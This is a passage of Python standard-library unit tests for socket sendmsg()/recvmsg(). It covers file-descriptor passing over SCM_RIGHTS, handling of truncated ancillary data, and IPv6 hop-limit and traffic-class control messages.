# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
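# Illustrative sketch (not part of the test suite, never called): the
# SCM_RIGHTS pattern exercised by SCMRightsTest above, passing a file
# descriptor over an AF_UNIX socket pair.  The helper name is invented for
# illustration; it assumes a Unix platform with socketpair(),
# sendmsg()/recvmsg() and CMSG_SPACE() available.
def _scm_rights_sketch(fd):
    import array, socket
    a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    with a, b:
        # One byte of normal data plus one int-sized SCM_RIGHTS item.
        a.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                            array.array("i", [fd]))])
        bufsize = socket.CMSG_SPACE(array.array("i").itemsize)
        msg, ancdata, flags, addr = b.recvmsg(1, bufsize)
        level, type_, data = ancdata[0]
        fds = array.array("i")
        # Discard any trailing partial int, as closeRecvmsgFDs() does.
        fds.frombytes(data[:len(data) - (len(data) % fds.itemsize)])
        return fds[0]  # a new descriptor for the same open file as fd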
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
